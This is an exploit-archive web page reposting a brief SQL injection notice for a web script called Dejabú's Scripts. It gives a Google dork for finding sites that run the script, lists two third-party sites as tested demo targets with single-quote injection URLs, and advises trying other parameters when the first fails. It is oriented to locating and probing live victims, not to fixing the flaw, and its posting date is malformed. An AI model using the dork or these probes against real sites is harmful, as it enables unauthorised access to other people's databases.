Home / os / winmobile

Dejab's Scripts SQL Injection

Posted on 30 November -0001

<HTML><HEAD><TITLE>Dejabú's Scripts SQL Injection</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY><—————— header data start ——————- > ############################################################# # Application Name : SQLi in Dejabú's Scripts # Vulnerable Type : SQL Ä°njection # Google Dork: intext:Diseño de páginas web Dejabú inurl:php?id= # Author: fl3xpl0it a.k.a KurokoTetsuya # Date: 20.02.2017 # Tested On Demo Sites: [+] http://www.cepaproduccion.com/content/news.php?id=1114' [+] http://www.cedeal.org/content/publicaciones.php?id=34'&pagina=2 # Warning: If you not found SQLi , you try SQLi other parameter. # Example: http://www.target.com/vuln.php?cat=54&id=61' (No SQLi) # Example: http://www.target.com/vuln.php?cat=54'&id=61 (SQLi Detected) ############################################################# < ——————- header data end of ——————- ></BODY></HTML>

 

TOP